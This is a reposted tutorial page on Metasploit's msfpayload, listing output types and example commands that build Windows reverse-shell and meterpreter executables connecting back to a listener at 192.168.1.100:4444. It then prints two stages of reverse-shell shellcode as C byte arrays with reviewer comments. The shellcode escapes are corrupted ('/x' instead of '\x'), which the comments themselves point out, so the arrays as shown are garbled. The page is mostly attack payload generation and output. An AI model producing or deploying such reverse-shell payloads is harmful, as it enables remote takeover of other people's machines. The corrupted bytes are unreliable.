
Metasploit msfpayload(转自 影子叔)

更新时间:2022-09-17 07:57:17

Used to generate different types of payloads.


Brief Tutorial

Location:

/pentest/exploit/framework3

Usage:

./msfpayload <payload> <variable=value> <output type>

output type:
S summary and options of the payload
C C language
P Perl
y Ruby
R Raw, allows payload to be piped into msfencode and other tools
J JavaScript
X Windows executable
V VBA

Examples:

Create a reverse shell payload as a Windows executable (output type X):

./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=4444 X > evil.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
Length: 278
Options: LHOST=192.168.1.100,LPORT=4444

Create a meterpreter payload as a Windows executable (output type X):

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 X > meterpreter.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 278
Options: LHOST=192.168.1.100

Create a reverse shell payload as a C byte array (output type C):

The stager (reverse | bind) is delivered first and then loads the stage (shell | vnc | meterpreter); the C output below therefore consists of two arrays, one per stage.

./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.100 C
/*
* windows/shell/reverse_tcp - 278 bytes (stage 1)
* http://www.metasploit.com
* EXITFUNC=seh, LPORT=4444, LHOST=192.168.1.100
*/
/*
 * Stage 1 (the stager) exactly as printed by msfpayload's "C" output type:
 * a byte array only, with nothing here that loads or runs it.
 *
 * NOTE(review): every escape below is written "/x.." (forward slash) rather
 * than C's "\x.." hex escape, so as pasted the literal holds the text of the
 * escapes, not the 278 bytes the header claims. The backslashes were
 * presumably lost when the tool output was copied onto the page; the bytes
 * are left untouched here rather than guessed at.
 *
 * Length check: 18 lines of 15 escapes plus 8 on the last line = 278, which
 * agrees with the header.
 *
 * Artifacts visible in the listing (hedged, not verified against a fresh
 * run): "/x57/x53/x32/x5f/x33/x32/x00" is the ASCII "WS2_32\0" (Winsock
 * library name), and "/xc0/xa8/x01/x64" / "/x02/x00/x11/x5c" near the end
 * match the LHOST=192.168.1.100 (c0.a8.01.64) and LPORT=4444 (0x115c)
 * values from the options line, i.e. the connect-back address is embedded
 * in the payload bytes — TODO confirm. Changing LHOST/LPORT changes those
 * bytes, which matters for anyone writing byte-pattern detections.
 *
 * A second array also named "buf" follows for stage 2; the two listings are
 * separate msfpayload outputs and would not compile together in a single
 * translation unit.
 */
unsigned char buf[] =
"/xfc/xe8/x56/x00/x00/x00/x53/x55/x56/x57/x8b/x6c/x24/x18/x8b"
"/x45/x3c/x8b/x54/x05/x78/x01/xea/x8b/x4a/x18/x8b/x5a/x20/x01"
"/xeb/xe3/x32/x49/x8b/x34/x8b/x01/xee/x31/xff/xfc/x31/xc0/xac"
"/x38/xe0/x74/x07/xc1/xcf/x0d/x01/xc7/xeb/xf2/x3b/x7c/x24/x14"
"/x75/xe1/x8b/x5a/x24/x01/xeb/x66/x8b/x0c/x4b/x8b/x5a/x1c/x01"
"/xeb/x8b/x04/x8b/x01/xe8/xeb/x02/x31/xc0/x5f/x5e/x5d/x5b/xc2"
"/x08/x00/x5e/x6a/x30/x59/x64/x8b/x19/x8b/x5b/x0c/x8b/x5b/x1c"
"/x8b/x1b/x8b/x5b/x08/x53/x68/x8e/x4e/x0e/xec/xff/xd6/x89/xc7"
"/x53/x68/x54/xca/xaf/x91/xff/xd6/x81/xec/x00/x01/x00/x00/x50"
"/x57/x56/x53/x89/xe5/xe8/x1f/x00/x00/x00/x90/x01/x00/x00/xb6"
"/x19/x18/xe7/xa4/x19/x70/xe9/xec/xf9/xaa/x60/xd9/x09/xf5/xad"
"/xcb/xed/xfc/x3b/x57/x53/x32/x5f/x33/x32/x00/x5b/x8d/x4b/x18"
"/x51/xff/xd7/x89/xdf/x89/xc3/x8d/x75/x14/x6a/x05/x59/x51/x53"
"/xff/x34/x8f/xff/x55/x04/x59/x89/x04/x8e/xe2/xf2/x2b/x27/x54"
"/xff/x37/xff/x55/x28/x31/xc0/x50/x50/x50/x50/x40/x50/x40/x50"
"/xff/x55/x24/x89/xc7/x68/xc0/xa8/x01/x64/x68/x02/x00/x11/x5c"
"/x89/xe1/x6a/x10/x51/x57/xff/x55/x20/x6a/x40/x5e/x56/xc1/xe6"
"/x06/x56/xc1/xe6/x08/x56/x6a/x00/xff/x55/x0c/x89/xc3/x6a/x00"
"/x56/x53/x57/xff/x55/x18/xff/xd3";

/*
* windows/shell/reverse_tcp - 474 bytes (stage 2)
* http://www.metasploit.com
*/
/*
 * Stage 2 (the "shell" stage) as printed by msfpayload; this is the part the
 * stage-1 stager fetches over the connection and hands control to. Again a
 * bare byte array with no loader code.
 *
 * NOTE(review): the escapes are "/x.." here too, so the literal as pasted is
 * text rather than the 474 bytes named in the header; bytes left as-is.
 *
 * Length check: 31 lines of 15 escapes plus 9 on the last line = 474,
 * matching the header.
 *
 * Artifacts visible in the listing (hedged): the opening
 * "/x68/x33/x32/x00/x00/x68/x57/x53/x32/x5f" contains "32\0\0" and "WS2_",
 * i.e. "WS2_32" again, and "/x43/x4d/x44/x00" is ASCII "CMD\0", consistent
 * with this stage spawning a command shell — TODO confirm. Unlike stage 1,
 * no LHOST/LPORT-looking bytes appear here, which fits the stage being
 * reached through the socket the stager already opened.
 *
 * Reuses the identifier "buf" from the stage-1 listing above; keep the two
 * in separate files (or rename one) if both are ever placed in source.
 */
unsigned char buf[] =
"/x68/x33/x32/x00/x00/x68/x57/x53/x32/x5f/x57/xfc/xe8/x4c/x00"
"/x00/x00/x60/x8b/x6c/x24/x28/x8b/x45/x3c/x8b/x7c/x05/x78/x01"
"/xef/x8b/x4f/x18/x8b/x5f/x20/x01/xeb/xe3/x30/x49/x8b/x34/x8b"
"/x01/xee/x31/xc0/x99/xac/x84/xc0/x74/x07/xc1/xca/x0d/x01/xc2"
"/xeb/xf4/x3b/x54/x24/x24/x75/xe3/x8b/x5f/x24/x01/xeb/x66/x8b"
"/x0c/x4b/x8b/x5f/x1c/x01/xeb/x03/x2c/x8b/x89/x6c/x24/x1c/x61"
"/xc2/x08/x00/x6a/x30/x59/x64/x8b/x31/x8b/x76/x0c/x8b/x76/x1c"
"/xad/x8b/x58/x08/x5e/x53/x68/x8e/x4e/x0e/xec/xff/xd6/x97/x53"
"/x56/x57/x8d/x44/x24/x10/x50/xff/xd7/x50/x50/x50/x68/xb6/x19"
"/x18/xe7/xff/xd6/x97/x68/xa4/x19/x70/xe9/xff/xd6/x95/x68/x08"
"/x92/xe2/xed/xff/xd6/x50/x57/x55/x83/xec/x10/x89/xe5/x89/xee"
"/x6a/x01/x6a/x00/x6a/x0c/x89/xe1/x6a/x00/x51/x56/xad/x56/x53"
"/x68/x80/x8f/x0c/x17/xff/x55/x20/x89/xc7/xff/xd0/x89/xe0/x6a"
"/x00/x50/x8d/x75/x08/x56/x8d/x75/x0c/x56/xff/xd7/x68/x43/x4d"
"/x44/x00/x89/xe2/x31/xc0/x8d/x7a/xac/x6a/x15/x59/xf3/xab/x83"
"/xec/x54/xc6/x42/xbc/x44/x66/xc7/x42/xe8/x01/x01/x8b/x75/x08"
"/x89/x72/xfc/x89/x72/xf8/x8b/x75/x04/x89/x72/xf4/x8d/x42/xbc"
"/x54/x50/x51/x51/x51/x41/x51/x49/x51/x51/x52/x51/x53/x68/x72"
"/xfe/xb3/x16/xff/x55/x20/xff/xd0/x31/xc0/xb4/x04/x96/x29/xf4"
"/x89/xe7/x6a/x64/x53/x68/xb0/x49/x2d/xdb/xff/x55/x20/xff/xd0"
"/x31/xc0/x50/x57/x50/x50/x50/xff/x75/x0c/x53/x68/x11/xc4/x07"
"/xb4/xff/x55/x20/xff/xd0/x85/xc0/x74/x74/x31/xc0/x3b/x07/x74"
"/x36/xe8/x77/x00/x00/x00/x50/x89/xe1/x50/x51/x56/x57/xff/x75"
"/x0c/x53/x68/x16/x65/xfa/x10/xff/x55/x20/xff/xd0/x85/xc0/x74"
"/x50/x31/xc0/x59/x39/xc8/x74/x11/x50/x51/x57/xff/x75/x28/xff"
"/x55/x10/x31/xc9/x39/xc8/x7c/x3a/xeb/xab/x89/xe0/xe8/x3f/x00"
"/x00/x00/x31/xc0/x50/x56/x57/xff/x75/x28/xff/x55/x14/x31/xc9"
"/x39/xc8/x7c/x86/x74/x1e/x51/x89/xe2/x51/x52/x50/x57/xff/x75"
"/x00/x53/x68/x1f/x79/x0a/xe8/xff/x55/x20/xff/xd0/x85/xc0/x74"
"/x05/x31/xc0/x59/xeb/xc8/x53/x68/xf0/x8a/x04/x5f/xff/x55/x20"
"/x31/xc9/x51/xff/xd0/x50/x54/x68/x7e/x66/x04/x80/xff/x75/x28"
"/xff/x55/x18/x85/xc0/x58/x75/xe0/xc3";